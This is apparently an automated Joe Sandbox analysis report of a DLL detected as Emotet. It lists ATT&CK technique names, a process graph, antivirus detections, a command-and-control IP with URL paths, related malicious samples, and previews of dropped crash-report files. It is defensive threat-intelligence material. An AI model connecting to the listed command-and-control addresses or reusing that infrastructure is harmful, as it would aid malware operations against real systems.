                      External Remote ServicesScheduled TaskStartup ItemsStartup ItemsRundll321DCSyncFile and Directory Discovery2Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobFile Deletion1Proc FilesystemSystem Information Discovery24Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 signatures2 2 Behavior Graph ID: 532437 Sample: nhlHEF5IVY Startdate: 02/12/2021 Architecture: WINDOWS Score: 84 47 Sigma detected: Emotet RunDLL32 Process Creation 2->47 49 Multi AV Scanner detection for submitted file 2->49 51 Yara detected Emotet 2->51 8 loaddll32.exe 1 2->8         started        10 svchost.exe 3 8 2->10         started        12 svchost.exe 1 2->12         started        14 3 other processes 2->14 process3 process4 16 rundll32.exe 2 8->16         started        19 cmd.exe 1 8->19         started        21 rundll32.exe 8->21         started        27 3 other processes 8->27 23 WerFault.exe 10->23         started        25 WerFault.exe 10->25         started        signatures5 45 Hides that the sample has been downloaded from the Internet (zone.identifier) 16->45 29 rundll32.exe 16->29         started        31 rundll32.exe 19->31         started        33 rundll32.exe 21->33         started        35 rundll32.exe 27->35         started        process6 process7 37 rundll32.exe 29->37         started        41 rundll32.exe 31->41         started        dnsIp8 43 45.63.5.129, 443, 49794 AS-CHOOPAUS United States 37->43 53 System process connects to network (likely due to code injection or exploit) 37->53 signatures9

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      nhlHEF5IVY.dll21%VirustotalBrowse
                      nhlHEF5IVY.dll18%ReversingLabsWin32.Trojan.Phonzy

                      Dropped Files

                      No Antivirus matches

                      Unpacked PE Files

                      SourceDetectionScannerLabelLinkDownload
                      0.2.loaddll32.exe.950000.0.unpack100%AviraHEUR/AGEN.1110387Download File
                      19.2.rundll32.exe.33c0000.0.unpack100%AviraHEUR/AGEN.1110387Download File
                      0.0.loaddll32.exe.950000.0.unpack100%AviraHEUR/AGEN.1110387Download File
                      5.2.rundll32.exe.2e60000.1.unpack100%AviraHEUR/AGEN.1110387Download File
                      0.0.loaddll32.exe.950000.9.unpack100%AviraHEUR/AGEN.1110387Download File
                      4.2.rundll32.exe.ce0000.0.unpack100%AviraHEUR/AGEN.1110387Download File
                      0.0.loaddll32.exe.950000.6.unpack100%AviraHEUR/AGEN.1110387Download File
                      3.2.rundll32.exe.9f0000.0.unpack100%AviraHEUR/AGEN.1110387Download File
                      6.2.rundll32.exe.a60000.1.unpack100%AviraHEUR/AGEN.1110387Download File
                      0.0.loaddll32.exe.950000.3.unpack100%AviraHEUR/AGEN.1110387Download File
                      8.2.rundll32.exe.2db0000.0.unpack100%AviraHEUR/AGEN.1110387Download File

                      Domains

                      No Antivirus matches

                      URLs

                      SourceDetectionScannerLabelLink
                      https://www.disneyplus.com/legal/your-california-privacy-rights0%URL Reputationsafe
                      https://45.63.5.129/VCbYkbegGeqHFlwstrEAhPVucLQzDdpcoetAUGcPQabBfXgRG0%Avira URL Cloudsafe
                      https://www.disneyplus.com/legal/privacy-policy0%URL Reputationsafe
                      http://crl.m0%URL Reputationsafe
                      https://45.63.5.129/VCbYkbegGeqHFlwstrEAhPVucLQzDdpcoetAUGcPQabBfXg~0%Avira URL Cloudsafe
                      https://disneyplus.com/legal.0%URL Reputationsafe
                      http://crl.ver)0%Avira URL Cloudsafe
                      https://www.tiktok.com/legal/report/feedback0%URL Reputationsafe
                      http://crl.microsoft%C0%Avira URL Cloudsafe
                      https://45.63.5.129/VCbYkbegGeqHFlwstrEAhPVucLQzDdpcoetAUGcPQabBfXg0%Avira URL Cloudsafe
                      http://help.disneyplus.com.0%URL Reputationsafe
                      https://45.63.5.129/0%Avira URL Cloudsafe

                      Domains and IPs

                      Contacted Domains

                      No contacted domains info

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
                      https://45.63.5.129/VCbYkbegGeqHFlwstrEAhPVucLQzDdpcoetAUGcPQabBfXgtrue
                      • Avira URL Cloud: safe
                      		unknown

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      https://www.disneyplus.com/legal/your-california-privacy-rightssvchost.exe, 0000001B.00000003.1130959349.0000024B21961000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000003.1129875776.0000024B219AC000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000003.1129903525.0000024B219AC000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000003.1130969538.0000024B21961000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      https://45.63.5.129/VCbYkbegGeqHFlwstrEAhPVucLQzDdpcoetAUGcPQabBfXgRGrundll32.exe, 00000013.00000002.1183797594.000000000346A000.00000004.00000020.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://www.disneyplus.com/legal/privacy-policysvchost.exe, 0000001B.00000003.1130959349.0000024B21961000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000003.1129875776.0000024B219AC000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000003.1129903525.0000024B219AC000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000003.1130969538.0000024B21961000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://crl.mWerFault.exe, 00000011.00000002.960325858.0000000003478000.00000004.00000020.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      https://45.63.5.129/VCbYkbegGeqHFlwstrEAhPVucLQzDdpcoetAUGcPQabBfXg~rundll32.exe, 00000013.00000002.1183797594.000000000346A000.00000004.00000020.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://disneyplus.com/legal.svchost.exe, 0000001B.00000003.1130959349.0000024B21961000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000003.1129875776.0000024B219AC000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000003.1129903525.0000024B219AC000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000003.1130969538.0000024B21961000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://crl.ver)svchost.exe, 0000001B.00000002.1153046299.0000024B210EC000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      		low
                      http://upx.sf.netAmcache.hve.14.drfalse
                        		high
                        https://www.tiktok.com/legal/report/feedbacksvchost.exe, 0000001B.00000003.1130904279.0000024B21990000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000003.1130892648.0000024B2196E000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000003.1130827300.0000024B219C8000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000003.1130929870.0000024B21E02000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000003.1130914623.0000024B219B1000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000003.1130856335.0000024B219C8000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://crl.microsoft%CWerFault.exe, 00000011.00000002.960325858.0000000003478000.00000004.00000020.sdmpfalse
                        • Avira URL Cloud: safe
                        		low
                        http://help.disneyplus.com.svchost.exe, 0000001B.00000003.1130959349.0000024B21961000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000003.1129875776.0000024B219AC000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000003.1129903525.0000024B219AC000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000003.1130969538.0000024B21961000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://45.63.5.129/rundll32.exe, 00000013.00000002.1183844764.00000000034BA000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown

                        Contacted IPs

                        • No. of IPs < 25%
                        • 25% < No. of IPs < 50%
                        • 50% < No. of IPs < 75%
                        • 75% < No. of IPs

                        Public

                        IPDomainCountryFlagASNASN NameMalicious
                        45.63.5.129
                        		unknownUnited States
                        		20473AS-CHOOPAUStrue

                        General Information

                        Joe Sandbox Version:34.0.0 Boulder Opal
                        Analysis ID:532437
                        Start date:02.12.2021
                        Start time:09:32:17
                        Joe Sandbox Product:CloudBasic
                        Overall analysis duration:0h 11m 51s
                        Hypervisor based Inspection enabled:false
                        Report type:light
                        Sample file name:nhlHEF5IVY (renamed file extension from none to dll)
                        Cookbook file name:default.jbs
                        Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                        Number of analysed new started processes analysed:29
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:0
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • HDC enabled
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Detection:MAL
                        Classification:mal84.troj.evad.winDLL@36/14@0/1
                        EGA Information:Failed
                        HDC Information:
                        • Successful, ratio: 21.8% (good quality ratio 20.1%)
                        • Quality average: 72.7%
                        • Quality standard deviation: 27.6%
                        HCA Information:
                        • Successful, ratio: 70%
                        • Number of executed functions: 0
                        • Number of non-executed functions: 0
                        Cookbook Comments:
                        • Adjust boot time
                        • Enable AMSI
                        • Override analysis time to 240s for rundll32
                        Warnings:
                        Show All
                        • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, wuapihost.exe
                        • Excluded IPs from analysis (whitelisted): 23.211.6.115, 20.189.173.22, 20.54.110.249, 40.91.112.76
                        • Excluded domains from analysis (whitelisted): displaycatalog-rp-uswest.md.mp.microsoft.com.akadns.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, onedsblobprdwus17.westus.cloudapp.azure.com, ctldl.windowsupdate.com, store-images.s-microsoft.com-c.edgekey.net, wus2-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, arc.msn.com, ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, consumer-displaycatalogrp-aks2aks-uswest.md.mp.microsoft.com.akadns.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, watson.telemetry.microsoft.com, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                        • Not all processes where analyzed, report is missing behavior information
                        • Report size exceeded maximum capacity and may have missing behavior information.
                        • Report size getting too big, too many NtOpenKeyEx calls found.
                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                        • Report size getting too big, too many NtQueryValueKey calls found.

                        Simulations

                        Behavior and APIs

                        TimeTypeDescription
                        09:35:31API Interceptor1x Sleep call for process: WerFault.exe modified
                        09:36:50API Interceptor7x Sleep call for process: svchost.exe modified

                        Joe Sandbox View / Context

                        IPs

                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                        45.63.5.129IGidwJjoUs.dllGet hashmaliciousBrowse
                          efELSMI5R4.dllGet hashmaliciousBrowse

                            Domains

                            No context

                            ASN

                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                            AS-CHOOPAUSIGidwJjoUs.dllGet hashmaliciousBrowse
                            • 45.63.5.129
                            efELSMI5R4.dllGet hashmaliciousBrowse
                            • 45.63.5.129
                            ImSL42AOtZ.exeGet hashmaliciousBrowse
                            • 45.63.36.79
                            spZRMihlrkFGqYq1f.dllGet hashmaliciousBrowse
                            • 66.42.57.149
                            spZRMihlrkFGqYq1f.dllGet hashmaliciousBrowse
                            • 66.42.57.149
                            iU17wh2uUd.exeGet hashmaliciousBrowse
                            • 149.28.253.196
                            iU17wh2uUd.exeGet hashmaliciousBrowse
                            • 149.28.253.196
                            Sz4lxTmH7r.exeGet hashmaliciousBrowse
                            • 149.28.253.196
                            7AF33E5528AB8A8F45EE7B8C4DD24B4014FEAA6E1D310.exeGet hashmaliciousBrowse
                            • 149.28.253.196
                            RFIlSRQKzj.exeGet hashmaliciousBrowse
                            • 45.32.115.235
                            setup_x86_x64_install.exeGet hashmaliciousBrowse
                            • 149.28.253.196
                            991D4DC612FF80AB2506510DBA31531DB995FE3F64318.exeGet hashmaliciousBrowse
                            • 149.28.253.196
                            MMUc2aeWxZ.exeGet hashmaliciousBrowse
                            • 149.28.253.196
                            0pvsj0MF1D.exeGet hashmaliciousBrowse
                            • 149.28.253.196
                            Linux_amd64Get hashmaliciousBrowse
                            • 45.32.162.141
                            nkXzJnW7AH.exeGet hashmaliciousBrowse
                            • 149.28.253.196
                            67MPsax8fd.exeGet hashmaliciousBrowse
                            • 136.244.117.138
                            Linux_x86Get hashmaliciousBrowse
                            • 45.77.44.252
                            uI6mJo4TJQ.exeGet hashmaliciousBrowse
                            • 149.28.253.196
                            uI6mJo4TJQ.exeGet hashmaliciousBrowse
                            • 149.28.253.196

                            JA3 Fingerprints

                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                            51c64c77e60f3980eea90869b68c58a8IGidwJjoUs.dllGet hashmaliciousBrowse
                            • 45.63.5.129
                            efELSMI5R4.dllGet hashmaliciousBrowse
                            • 45.63.5.129
                            TYLNb8VvnmYA.dllGet hashmaliciousBrowse
                            • 45.63.5.129
                            2gyA5uNl6VPQUA.dllGet hashmaliciousBrowse
                            • 45.63.5.129
                            spZRMihlrkFGqYq1f.dllGet hashmaliciousBrowse
                            • 45.63.5.129
                            spZRMihlrkFGqYq1f.dllGet hashmaliciousBrowse
                            • 45.63.5.129
                            fehiVK2JSx.dllGet hashmaliciousBrowse
                            • 45.63.5.129
                            kQ9HU0gKVH.exeGet hashmaliciousBrowse
                            • 45.63.5.129
                            gvtdsqavfej.dllGet hashmaliciousBrowse
                            • 45.63.5.129
                            mhOX6jll6x.dllGet hashmaliciousBrowse
                            • 45.63.5.129
                            dguQYT8p8j.dllGet hashmaliciousBrowse
                            • 45.63.5.129
                            jSxIzXfwc7.dllGet hashmaliciousBrowse
                            • 45.63.5.129
                            mhOX6jll6x.dllGet hashmaliciousBrowse
                            • 45.63.5.129
                            X2XCewI2Yy.dllGet hashmaliciousBrowse
                            • 45.63.5.129
                            dguQYT8p8j.dllGet hashmaliciousBrowse
                            • 45.63.5.129
                            date1%3fBNLv65=pAAS.dllGet hashmaliciousBrowse
                            • 45.63.5.129
                            HMvjzUYq2h.dllGet hashmaliciousBrowse
                            • 45.63.5.129
                            s9BZBDWmi4.dllGet hashmaliciousBrowse
                            • 45.63.5.129
                            bFx5bZRC6P.dllGet hashmaliciousBrowse
                            • 45.63.5.129
                            c7IUEh66u6.dllGet hashmaliciousBrowse
                            • 45.63.5.129

                            Dropped Files

                            No context

                            Created / dropped Files

                            C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_loaddll32.exe_88e9c9cb640b4f665f2020b110738337d7578_d70d8aa6_0dacd410\Report.wer
                            Process:C:\Windows\SysWOW64\WerFault.exe
                            File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):65536
                            Entropy (8bit):0.675453607447359
                            Encrypted:false
                            SSDEEP:96:0nIzqnZqyBy9hkoyt7Jf0pXIQcQ5c6A2cE2cw33+a+z+HbHg0VG4rmMOyWZAXGnK:TGB+HnM28jjAq/u7sUS274ItW
                            MD5:3A677EE5FF88A61E83FF39BC2EC71A32
                            SHA1:69009A1B51235712DDE27F921E90522682087661
                            SHA-256:FCF3EA077E0CA2FD817974948A0776F965C40753CD60EE78AB3DDA9E3DA9E897
                            SHA-512:E9296B4154255C881D1C6680A2BCA76D121D260B33ED5DA4E8822E54B9081751CA20ADF19F4F858A6CBE601F41A44AF136414803F0D4EBB96CA461C6C3BB74CA
                            Malicious:false
                            Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.2.8.2.9.0.7.7.1.0.9.6.3.2.9.2.0.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.c.c.9.9.d.c.0.-.c.5.e.4.-.4.f.3.2.-.a.6.d.e.-.0.d.e.3.e.e.0.2.4.1.2.d.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.c.3.8.7.c.4.4.-.3.2.6.3.-.4.9.6.d.-.b.0.f.9.-.f.8.f.4.4.c.5.9.b.8.f.5.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.l.o.a.d.d.l.l.3.2...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.9.f.0.-.0.0.0.1.-.0.0.1.b.-.4.4.2.2.-.6.0.3.c.5.7.e.7.d.7.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.d.a.3.9.a.3.e.e.5.e.6.b.4.b.0.d.3.2.5.5.b.f.e.f.9.5.6.0.1.8.9.0.a.f.d.8.0.7.0.9.!.0.0.0.0.d.a.3.9.a.3.e.e.5.e.6.b.4.b.0.d.3.2.5.5.b.f.e.f.9.5.6.0.1.8.9.0.a.f.d.8.0.7.0.9.!.l.o.a.d.d.l.l.3.2...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.1././.0.9././.2.8.:.1.1.:.5.3.:.0.5.!.0.!.l.o.a.d.d.l.l.3.2...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.
                            C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_loaddll32.exe_d71d33d652a62c864cb684e881f783bcee8c2df7_d70d8aa6_0ddd14c2\Report.wer
                            Process:C:\Windows\SysWOW64\WerFault.exe
                            File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):65536
                            Entropy (8bit):0.6788532132552507
                            Encrypted:false
                            SSDEEP:96:cYFBzqnZqyay9hk1Dg3fWpXIQcQGc6IAPcEEcw3K+a+z+HbHg0VG4rmMOyWZAXGn:hbGBiHoUqusjAq/u7sFS274ItW
                            MD5:56EB563C9E449B35D350FE2AF248CE9A
                            SHA1:C38EA0E32C5EEA438886FF4E4C139591B7B9F6CF
                            SHA-256:3527C19D242D4C9E7BB49F8D9260C401183CE11BCF25E068FB423AB104324D32
                            SHA-512:8AAF3DA2FB2D55F489E75E3F8F550A8D83328CBFB92EE75768CBF08579639A0FBA3D055EB61962AE4CADC749B5EB12856A99E2D76DF22F1AE35C93B708C78A6E
                            Malicious:false
                            Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.2.8.2.9.0.7.7.1.8.8.6.4.8.1.0.6.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.8.2.9.0.7.7.2.9.6.1.4.7.6.5.7.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.f.a.3.1.f.0.a.-.e.0.c.a.-.4.5.4.8.-.b.6.c.7.-.1.4.1.9.0.0.0.4.b.1.f.e.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.3.1.1.c.3.6.c.-.a.1.2.d.-.4.f.d.1.-.b.2.5.9.-.e.5.0.c.d.e.2.9.e.6.e.7.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.l.o.a.d.d.l.l.3.2...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.9.f.0.-.0.0.0.1.-.0.0.1.b.-.4.4.2.2.-.6.0.3.c.5.7.e.7.d.7.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.d.a.3.9.a.3.e.e.5.e.6.b.4.b.0.d.3.2.5.5.b.f.e.f.9.5.6.0.1.8.9.0.a.f.d.8.0.7.0.9.!.0.0.0.0.d.a.3.9.a.3.e.e.5.e.6.b.4.b.0.d.3.2.5.5.b.f.e.f.9.5.6.0.1.8.9.0.a.f.d.8.0.7.0.9.!.l.o.a.d.d.l.l.3.2...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.
                            C:\ProgramData\Microsoft\Windows\WER\Temp\WER1DED.tmp.csv
                            Process:C:\Windows\System32\svchost.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):50214
                            Entropy (8bit):3.055875486247182
                            Encrypted:false
                            SSDEEP:1536:pwH6p8IE6/xpXAziUFNPlBnm53gRdeBRI:pwH6p8IE6/xpXAziUFNPlBnm53gRd2RI
                            MD5:75E46292FCCADC990C9FA5B3A85C0945
                            SHA1:5BEACAF4AC57E6870DBD8FF13F50FE9336F25F3C
                            SHA-256:F157465E50F0CE2439B05C9971F264C9D328333B816E06EAA8E23223C832D6DA
                            SHA-512:B7CE1BE4EB5CB550E820E68BAB8C31E9D460FAEEC989B76D665EC9E63DE88117B39FAFAB8505245A58E14C7B908DB5CB421382F807EA779692E9ECE946343739
                            Malicious:false
                            Preview: I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.
                            C:\ProgramData\Microsoft\Windows\WER\Temp\WER21A7.tmp.txt
                            Process:C:\Windows\System32\svchost.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):13340
                            Entropy (8bit):2.6939896893715987
                            Encrypted:false
                            SSDEEP:96:9GiZYWeq9R0hMgYZYhwWpHfYEZ7JtFiK+qg06wrmzsafM5g4WIby3:9jZDeqo+mhKAafM5g4Rby3
                            MD5:E932573E4009397CB61E58D34441B1C2
                            SHA1:7A05D61BEB4D76215B9CD454FD78F83BF7CD242A
                            SHA-256:60C2D30B96D4933E45A37C305BE1E3B8E96EAF6167E4083ADCBADF190ED99D4C
                            SHA-512:3FA3DBC88EAF915D096AFD06499183B1410FBF00702295C4F57C15D66E9B2B5BEDFB835262B030FB9891207FAD9142F6B9FEF6AEC7E98EAC1DB236CA3AEB7280
                            Malicious:false
                            Preview: B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.1.5.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .
                            C:\ProgramData\Microsoft\Windows\WER\Temp\WER4D6B.tmp.csv
                            Process:C:\Windows\System32\svchost.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):48936
                            Entropy (8bit):3.0567006842183746
                            Encrypted:false
                            SSDEEP:768:GlHvHYzExMQk/xDViwiDGkeFNPy+B0ZHX0rifZpmDBr:GlHvHYkMQk/xDViwi8FNPNB05X0rifZm
                            MD5:E76247A17721B20740BDA40AA040A387
                            SHA1:7778CC792049377FBD219803364A76ABD8DCAC37
                            SHA-256:D5CD7B4CD2D83DC7286B83FD0647D4089EE2400747B58B3E8AF909DB2A5B3001
                            SHA-512:3861F73E98EDFF2C389C004832C8EBB7EC5BC3477DCDFC4D28A2B19B06A63F66FEF40E09DD738988F9A8F23788C4879A1DA76CC66E6A16A9A0E6959A6EB7FAD5
                            Malicious:false
                            Preview: I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.
                            C:\ProgramData\Microsoft\Windows\WER\Temp\WER5183.tmp.txt
                            Process:C:\Windows\System32\svchost.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):13340
                            Entropy (8bit):2.6948925080297124
                            Encrypted:false
                            SSDEEP:96:9GiZYWb8bUwsXYwYpWuzPHUYEZhstFicqo0EwkNP62a4HUZfz2Ip63:9jZDbfHuzo2C2a4HUZfzxp63
                            MD5:1C7D28C39B5399BBA2CF6B665267C802
                            SHA1:34E54301F8E0C4E68113718B564301F11167E9D8
